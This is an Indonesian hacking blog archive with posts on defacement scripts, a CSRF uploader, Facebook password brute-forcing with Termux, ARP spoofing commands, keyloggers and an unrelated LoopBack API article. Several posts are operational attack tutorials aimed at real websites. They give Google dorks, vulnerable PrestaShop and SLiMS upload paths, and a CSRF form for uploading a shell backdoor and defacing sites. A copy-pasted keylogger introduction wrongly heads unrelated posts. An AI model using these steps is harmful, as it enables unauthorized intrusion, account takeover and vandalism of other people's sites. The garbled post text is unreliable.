Archive for March 2019

Download Script Deface Simple | Tito Sembiring

 Script Deface Simple By ./in3z501

assalamualaikum w.b.r 

selamat datang di blog sederhana gua bree kali ini gua mau bagiin script
deface simple dan kece terbaru, buatan ane maupun buatan para defacer
handal maupun defacer newbie.

oke langsung saja berikut ini adalah script deface nya 👇


1.script deface by me
ambil script nya disini





Download Script CSRF Online - ./in3z501

Download Script CSRF ./in3z501 Online




 Pada postingan kali ini saya akan memberikan script CSRF exploiter online!
Tetapi banyak yang tidak tau apa kepanjangan dari CSRF dan pengertian.
Apa sih kepanjangan dari CSRF?...
CSRF merupakan kepanjangan dari "Cross Site Request Forgery", adalah sebuah serangan pada website atau situs-situs yang dieksekusi atas wewenang korban, tanpa dikehendakinya.

Sekarang kalian sudah tau kan pengertian dari csrf:)

Ok ,kali ini saya akan memberikan kode atau script csrf nya!
Klik disini untuk mencopy scriptnya.
Pastekan di Notepad milik kalian!

Terserah deh mau kalian edit.

Jika kalian ingin menggunakan CSRF nya langsung kalian upload dulu file CSRF kalian di situs yang udah kalian tanam shell backdoor atau shell mini:D
Tampilan csrf online milik saya seperti gambar dibawah ini.



Tampilan csrf ./in3z01 online

Hack akun facebook metode bruteforce

Assalamualaikum Warahmatullahi Wabarakatuh

Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring , pada artikel kali ini saya akan menjelaskan apa itu Keylogger, Cara Kerja serta Pencegahannya.
Ok, tanpa banyak bacot langsung saja simak berikut :v

Cekidoooottt :v

Dripada klian pnsaran lngsung aja ni simak ..
Siapkan dulu prlngkapan nya.
1.hp, laptop, pc
2.sofware/apk termux
3.kesabaran dan ketabahan:v
4.kopi biar gk gilak (gak wajip kampang:v)
Lngsung klo klian pngguna pc sbaiknya psang dlu sofware pnyedia sistem linux, cari aja di google. Mimin saranin pkek hp krna lbih praktis (alasan gak punya modal bli pc. :p ).
Khusus penguna hp simak.

1. Donlod dlu apk termux di playstore.
2. Klo udah, bukk apk nya. Kita perlu mnginstall paket nya dlu… stiap printah tekan enter. Perhatikan
Ktikan perintah:
$ apt update && apt upgrade
$ apt install python2
$ apt install python2-dev
$ apt install wget
$ pkg install mechanize
$ mkdir facebook-brute
$ cd facebook-brute
$ mv facebook.apk facebook.py
$ mv password.apk password.txt
$ python2 facebook.py
Nb:setiap perintah tekan enter
Klo sudah akan muncul tmpilan seperti ini
Cari id target , caranya cari di google fine my id facebook,
3. Msukan id nya ke kolom yg tersedia, tekan enter.
4. Terakhir kitikan wordlis nya. Pasword.txt lihat gambar
Tekan enter biarkan proses berjalan. Klo brhasil mnmukan pasword yg cocok akan otomatis login.
Keberhasilan tergantung wordlis nya.
Sekian dlu klo msih bngung pm fb mimin, Harien efendi atau kontak email mimin. Mimin pun radak bingung mnjelaskan scara ditel:v
Nb: semua yg kamu lakukan sepenuhnya jadi tagung jwap kamu spenuh nya,. Mimin tdak brtanggung jwab.. untuk slalu brhati2 pngguna facebook gunakan pasword yg kuat dan cantumkan email atau no hp pemulihan akun untuk jaga2 bila akun diretas…

Deface POC File Attachment Upload


  • Assalamualaikum Warahmatullahi Wabarakatuh

Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring , pada artikel kali ini saya akan menjelaskan apa itu Keylogger, Cara Kerja serta Pencegahannya.
Ok, tanpa banyak bacot langsung saja simak berikut :v

Cekidoooottt :v, kali ini ane mau share tutorial deface dengan File Attachment. Okelah gausah banyak omong, langsung simak saja tutorial dibawah ini.
  • Google Dork : Gunakan otah vokep mu :v
  • Exploit : target.com/admin/modules/bibliography/pop_attach.php
  • Yang pertama kalian langsung nyari target aja, terserah dimana. Kalo udah dapet target, masukin exploit. Jika vuln maka tampilannya seperti dibawah ini.
  •         Kalian langsung masukin Title sama File To Attach, kalo udah langsung Upload saja.
  •      Untuk melihat hasil deface/file/script deface yang di upload tadi, kalian buka di site.com/repository/file.txt
    O
  • Oke, sekian tutorial hari ini, semoga bermanfaat. Terimakasih sudah berkunjung ^_^

Deface POC Prestashop File Upload

Deface Proof of Concept Prestashop File Upload

  

Assalamualaikum Warahmatullahi Wabarakatuh

Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring , pada artikel kali ini saya akan menjelaskan apa itu Keylogger, Cara Kerja serta Pencegahannya.
Ok, tanpa banyak bacot langsung saja simak berikut :v

Dork : 
   Inurl:"/modules/columnadverts/"
   Inurl:"/modules/homepageadvertise/"
   Inurl:"/modules/productpageadverts/"
   Inurl:"/modules/simpleslideshow/"
   Inurl:"/modules/vtemslideshow/"
   Index Of "/modules/columnadverts/"
   Index Of "/modules/homepageadvertise/"
   Index Of "/modules/productpageadverts/"
   Index Of "/modules/simpleslideshow/"
   Index Of "/modules/vtemslideshow/"

Exploit
 http://loclahost/ modules/columnadverts/uploadimage.php
 http://localhost/ modules/homepageadvertise/uploadimage.php
 http://localhost/ modules/productpageadverts/uploadimage.php
 http://localhost/ modules/simpleslideshow/uploadimage.php
 http://localhost/ modules/vtemslideshow/uploadimage.php

CSRF : 
<form method="POST" action="http://localhost/modules/modules name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>


Langsung Ke Tutorialnya.... :*

1. Cari Target Menggunakan Dork !

2. Pilih Salah Satu Situs Yang Ingin Di cRooTz   :v

3. Tambakan Exploit Setelah Url   :*
 http://localhost/ Exploitnya Pilih Satu Persatu !
Jika Vuln Tampilanya Akan Seperti Ini !

4. Copy CSRF Yang Ada Di Atas Tadi   :*
Jangan Lupa Edit Dulu CSRF Tersebut .
 Localhost   >  Website Target .
 Modules Name   >   Nama Exploit Yang Tadi Vuln .
Lalu Simpan Dengan Ex.HTML   > All Files

5. Buka CSRF Tersebut , Upload Shell Backdoor Kamu   :*
Jika Berhasil Akan Terlihat Seperti Ini


6. Dan Sekarang Lihat Letak Shell Nya
 http://localhost/modules/modules name/slides/Name_Shell.php

Kalau Sudah Ketemu Shellnya , Terserah Deh , Mau Deface Apanya Aja Bebas :*

ARP Attack




Assalamualaikum Warahmatullahi Wabarakatuh.

Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring . Pada artikel kali ini saya akan menjelaskan apa itu ARP Spoofing Attack serta cara kerjanya.

Sebelum lanjut alangkah baik nya berdoa dulu supaya anda bisa menyerap nya dengan baik :v

Ok tanpa banyak-banyak bacot langsung saja....
Cekidooootttt....!1!1!


ARP (Address Resolution Protocol) adalah network protocol yang berfungsi untuk memetakan network layer protocol address dengan data link layer hardware address. Misalnya, ARP digunakan untuk mengelompokkan IP Address dengan MAC Address yang sesuai dalam satu Local Area Network. Teknik hacking ARP attack ini adalah dengan memanfaatkan penggandaan MAC Address.

ARP spoofing merupakan konsep dari serangan penyadapan diantara terhadap dua mesin yang sedang berkomunikasi atau yang disebut dengan Man in The Middle Attack. Kita akan melakukan ARP spoofing dengan menggunakan skrip “arpret.c” skrip tersebut dibuat dengan bahasa pemrograman C yang bekerja dengan mengirim ARP reply palsu kepada host target dan hanya bisa dijalankan dalam sistem operasi Linux. Linux Slackware versi 12.1 berjalan di komputer penyadap yang menjalankan skrip tersebut mempunyai IP 192.168.10.22 dengan MAC address 00:1e:ec:c4:86:67 selain itu dilakukan setting kernel untuk bisa mem-forward paket ke tujuan lain dengan kata lain meneruskan paket yang telah diterima.


Setelah proses kompilasi skrip “arpret.c” di sistem operasi Linux Slackware, lalu kita akan mencoba mengirimkan sebuah ARP-reply palsu kepada komputer 192.168.10.7 dimana headernya kita memberikan MAC address penyusup tapi dengan IP 192.168.10.4 yang bertindak sebagai gateway dengan maksud komputer agar komputer penyusup dianggap gateway oleh komputer 192.168.10.7. Kita mengatur kernel agar bisa melakukan meneruskan paket dengan perintah dalam konsole Linux seperti di bawah ini :
# echo ”1” > /proc/sys/net/ipv4/ip_forwarding
Dilanjutkan dengan kompilasi skrip dan menjalankan skrip dengan opsi menggunakan kartu Ethernet eth0. Header ARP-reply berisi alamat IP gateway 192.168.10.4 tapi dengan MAC address 00:1e:ec:c4:86:67 lalu dikirimkan ke IP 192.168.10.6 dan opsi –k2 dengan maksud proses meracuni ARP cache dilakukan secara terus-menerus.
./arpret -i eth0 -s 192.168.10.4 -S 00:1e:ec:c4:86:67 -d 192.168.10.7 -D 00:50:ba:83:1b:d1 -k2
Hal diatas mengakibatkan ter-manipulasinya isi cache ARP yang sebelumnya cache untuk komputer gateway adalah 00:0C:F1:96:A7:1C tapi berubah menjadi MAC address dari komputer penyusup 00:1e:ec:c4:86:67. Seperti yang terlihat pada gambar dibawah ini pada komputer 192.168.10.7 yang menjalankan sistem operasi MS Windows XP SP2 dengan mengetikkan arp –a untuk melihat semua ARP cache yang tersimpan.

Dan berikut gambar ARP cache setelah diracuni menyimpan MAC address penyusup untuk alamat IP 192.168.10.4.


setelah spoof

Dalam setiap host dan perangkat switch dalam jaringan menyimpan catatan daftar MAC dan IP Address yang disebut dengan ARP cache. Sistem akan menggunakan ARP cache untuk berhubungan dengan host lain dalam pertukaran data. Jika alamat tidak terdapat dalam daftar di memori atau ARP cache, sistem akan menggunakan ARP untuk mencari tahu MAC address pada host tujuan dan perangkat switch menggunakan tabel ARP untuk membatasi trafik hanya untuk MAC address yang terdaftar pada port.
Sebelum serangan terjadi ARP cache dalam keadaan normal menyimpan alamat MAC dari tujuan transmisi data. Target penyadapan adalah di antara dua mesin yang terhubung pada jaringan yang sama dengan penyusup yaitu korban 1 pada IP 192.168.10.4 (00:0C:F1:96:A7:1C) dengan mesin korban 2 pada IP 192.168.10.7 (00:0C:F1:86:E3:35) dan mesin penyusup pada IP (00:1e:ec:c4:86:67). Pada serangan dilakukan sang penyusup akan melakukan pengiriman paket ARP-Reply yang berisi MAC dari mesin penyusup.
Penyusup —> korban 1 : (IP korban 2) is at (MAC penyusup)
Penyusup —> korban 2 : (IP korban 1) is at (MAC penyusup)
Jika kita analisa paket-paket yang dikirimkan penyusup ke korban menggunakan aplikasi bantu untuk analisa paket dalam jaringan yang bernama wireshark akan tampak seperti dibawah ini :


arp poison

Seperti yang kita lihat komputer penyusup mengirim ARP-reply kepada IP 192.168.10.4 berikut dengan alamat MAC dari komputer penyusup 00:1e:ec:c4:86:67 dan hal yang sama dikirimkan ARP-reply kepada IP 192.168.10.7 berikut dengan alamat MAC dari komputer penyusup 00:1e:ec:c4:86:67. Lalu lintas yang terjadi antara korban 1 dan korban 2 akan diterima terlebih dahulu oleh komputer penyusup sebelum di teruskan ke tujuan data yang bisa disadap adalah transmisi tidak menggunakan enkripsi atau berbasis plain text seperti   TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, NS, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG.

Sekian dari saya, mungkin hanya itu yang dapat saya jelaskan, untuk lebih lanjutnya silahkan hubungi admin melalui alamat E-Mail.

Spesial Thanks To : 
Allah SWT
Zone-Xploiter
Tech-Squad
#ARPAttack
#Zone-Xploiter
#Tech-Squad


KEYLOGGER : Pengertian, Kegunaan, Cara Kerja, dan Cara Mengatasinya


Assalamualaikum Warahmatullahi Wabarakatuh

Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring , pada artikel kali ini saya akan menjelaskan apa itu Keylogger, Cara Kerja serta Pencegahannya.
Ok, tanpa banyak bacot langsung saja simak berikut :v

Cekidoooottt :v

PENGERTIAN : 

     Keylogger merupakan singkatan dari Keystore Logger, yaitu sebuah perangkat yang digunakan untuk memantau penekanan tombol keyboard dan penyimpanannya. Keylogger juga terdapat dalam Software maupun Hardware.
     Keylogger yang berupa Hardware bisanya dipasangkan pada ujung mouse sehingga dapat mencegat data yang dialirkan dari keyboard menuju ke CPU. Sementara itu, Keylogger yang berupa Software terpasang didalam komputer dan bekerja secara sembunyi.
     Pada awal pembuatan Keylogger, Keylogger hanya digunakan untuk media perekam pengetikkan keyboard. Namun, sekarang fasilitas yang terdapat pada Keylogger sudah berkembang. Tidak hanya merekam pengetikkan pada keyboard saja, tapi bisa meng-capture keseluruhan gambar yang ditampilkan ketika korban menggunakan komputer. Bahkan, ada Keylogger yang bisa mengirim hasil rekaman nya kepada sebuah alamat E-Mail. Dan tentu saja ini dilakukan secara diam-diam oleh Software Keylogger.
     Software Keylogger sangatlah banyak, walaupun demikian cara penggunaannya pun tidak lah berbeda, hanya sedikit perbedaan. Berikut adalah beberapa daftar Keylogger yang banyak digunakan :


KEGUNAAN : 

     Sebuah keylogger adalah setiap jenis utilitas yang mencatat penekanan tombol yang dibuat oleh seseorang di komputer. Bagi banyak orang, hal pertama yang muncul dalam pikiran ketika mereka mendengar kata itu adalah gambar dari penggunaan sembarangan; hacker, pencuri kartu kredit, dan orang-orang mencuri password. Sementara orang menggunakannya untuk tujuan-tujuan ini, ada juga beberapa kegunaan yang dapat bermanfaat dan tidak buruk sama sekali.

1. Dokumen Pemulihan
     Sebagian besar pengguna komputer pernah mengalami situasi di mana mereka sedang bekerja pada email yang panjang, penelitian kertas, atau proyek, dan tiba-tiba baik komputer mereka crash atau listrik padam dan mereka kehilangan semua pekerjaan mereka. Jika mereka tidak ingat untuk menyimpan setiap begitu sering, atau kalau mereka menggunakan sebuah program yang tidak memiliki fitur auto-save, hasilnya akan bahwa mereka kehilangan semua pekerjaan mereka. Dalam situasi ini, sebuah keylogger dapat digunakan untuk memulihkan seluruh isi dari kertas atau dokumen yang sedang diketik. 
2. Monitoring Anak Anda
    Keyloggers juga dapat digunakan untuk memantau orang-orang dengan siapa anak-anak Anda chat online. Pada awalnya mungkin tampak seperti sebuah serangan pribadi, tetapi jika Anda pergi rute ini penting untuk menjelaskan kepada anak-anak Anda bahwa Anda hanya berusaha untuk melindungi mereka dari Cyber Crime dan tidak menyerang privasi mereka. Sayangnya, program ini telah mendapat nama buruk karena biasanya mereka muncul dalam berita di sebuah cerita yang berkaitan dengan beberapa Cyber Crime. Namun dalam aplikasi sebenarnya, mereka juga memiliki beberapa kegunaan yang bermanfaat dapat menghemat banyak waktu dan usaha.

CARA KERJA : 
     Secara umum dan sederhana, cara kerja keylogger ialah merekam segala sesuatu yang diketikkan melalui keyboard. Hasil rekaman disimpan dalam bentuk catatan atau log. Untuk menerima tombol keyboard yang sedang ditekan memerlukan sebuah fungsi. Untuk menggunakan fungsi ini acara membutuhkan timer untuk memonitor tombol-tombol yang di gunakan sencara continue. Parameter yang digunakan pada fungsi ini berupa nilai ascii. 

CARA MENGATASI KEYLOGGER

Cara mengatasi keylogger agar tidak berfungsi ialah :
1) Pastikan Anda menggunakan “On-Screen Keyboard”saat anda memasukkan password jika anda Login ke facebook atau e-mail anda dengan cara:
a) Klik Start pilih Program > Accessories > Accessibility > On-Screen Keyboard
b) Tempatkan kursor dikolom username dan password
c) Masukkan username dan password kamu dengan mengklik huruf/ angka yang ada pada On-Screen Keyboard
2) Dengan cara menggunakan anti virus terbaru, karena anti virus terbaru atau antivirus yang bagus bisa membaca keylogger ini sebagai virus
3) Anda bisa menggunakan anti keylogger. Anda bisa mendownload nya pada link dibawah. 

Sekian penjelasan tentang Keylogger dari saya, jika ada yang merasa keliru atau bingung, silahkan komentar dibawah :)

Cara Memasukkan Lagu Pada SCRIPT DEFACE





Assalamualaikum Warahmatullahi Wabarakatuh

Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring , pada artikel kali ini saya akan menjelaskan apa itu Keylogger, Cara Kerja serta Pencegahannya.
Ok, tanpa banyak bacot langsung saja simak berikut :v

Cekidoooottt :v

1. Script deface tentunya.

2. Notepad / Notepad++

Langkah :

1. Copy script berikut :
<iframe width="0" height="0" src="//www.youtube.com/embed/lqYQXIt4SpA?rel=0&autoplay=1&loop=1&playlist=60ItHLz5WEA" frameborder="0" allowfullscreen></iframe>


2. Perhatikan kode lqYQXIt4SpA dan 60ItHLz5WEA itu merupakan kode lagu nya, jika ingin mengganti, cari kode lagu youtube yang kamu inginkan.

Lalu, bagaimana cara mencari kode lagu yang diinginkan?
Contohnya :
https://www.youtube.com/watch?v=60ItHLz5WEA : Lagu Alan Walker - Faded

Jadi 60ItHLz5WEA merupakan kode untuk lagu alan walker - faded.

3. Masukkan kode lagu kedalam script diatas dan masukkan ke script deface.

4. Kemudian save script tersebut.

Coba untuk memasang script pada web. Jika sudah terdengar lagu, maka kalian berhasil. Tutorial ini sangat mudah, tapi perlu diperhatikan untuk permasalahan lagu yang tidak muncul.

nb : tidak semua lagu bisa ditambahkan pada script deface, jika kalian mencoba lagu A tidak berhasil cobalah untuk mengganti lagu B dan berhasil, maka permasalahan ada di lagu A yang tidak support.

Cara Mengembangkan API dengan Loop Back Framework

Assalamualaikum Warahmatullahi Wabarakatuh

Kembali lagi dengan saya Admin yang paling gans :v Tito Sembiring , pada artikel kali ini saya akan menjelaskan apa itu Keylogger, Cara Kerja serta Pencegahannya.
Ok, tanpa banyak bacot langsung saja simak berikut :v

Cekidoooottt :v



Mengembangkan API dengan LoopBack Framework di Node.js

 API adalah Application Programming Interface yang sering di gunakan oleh Devoloper applikasi mobile API merupakan sebuah kumpulan dari fungsi, protokol, dan perintah untuk membangun aplikasi pada OS tertentu.

Dengan API ini anda bisa mendapatkan data data lengkap tanpa menyimpan di dalam database, dan anda hanya memerlukan internet serta kuota untuk mengakses data yang dibutuhkan dari database server. 


Tetapi data data yang di kirim memerlukan keamanan serta kesetabilan yang baik agar pada saat di akses aplikasi tersebut tidak menimbulkan masalah, dan bagi para Devoloper jika anda ingin mengembangkan API dengan framework anda bisa menggunakan LoopBack ini. Contoh:

 // common/models/tes.json
......
"relations": {
  "gifts": {
  "type": "hasMany",
  "model": "Gift",
  "foreigbKey": ""
    }
 },
.....
LoopBack sendiri adalah framework yang berbasis Node.js open source dalam hal ini developer dapat memasukan parameter yang diinginkan dan LoopBack akan melakukan generate sumber kodenya.

Framework LoopBack ini telah merilis SDK untuk android, ios, dan angular JS. Selain dari pada itu tersedia juga beberapa komponen tambahan seperti login pihak ketiga, geolocation, pust data, dll. Dan jika anda ingin menginstall framework ini anda bisa install dengan Node.js, python, dan Github setelah itu Devoloper dapat membangun model API. 


Dan dengan mengunjungi API EXPOLER ini Devoloper dapat membuka aplikasi LoopBack melalui browser serta memungkinkan Devoloper untuk membuat, membaca, dan memperbarui, serta menghapus endpoin dalam API. 


Anda juga dapat memanfaatkan StrongLoop Arc untuk mengedit, memantau perkembangan API lewat sebuah virtual Selain itu, terdapat juga StrongLoop API Gateway yang menjadi perantaran antara API klien dengan API provider dalam mengamankan dan mengelola proses kedua komunikasi API tersebut agar berjalan dengan lancar.


LoopBack ini sangatlah cocok untuk membangun sebuah platform di android, IOS, java, dan angular. Selamat mencoba :)

- Copyright © AnarchoXploit - Tito Sembiring - Powered by TECH SQUAD - Designed by ./in3z501 -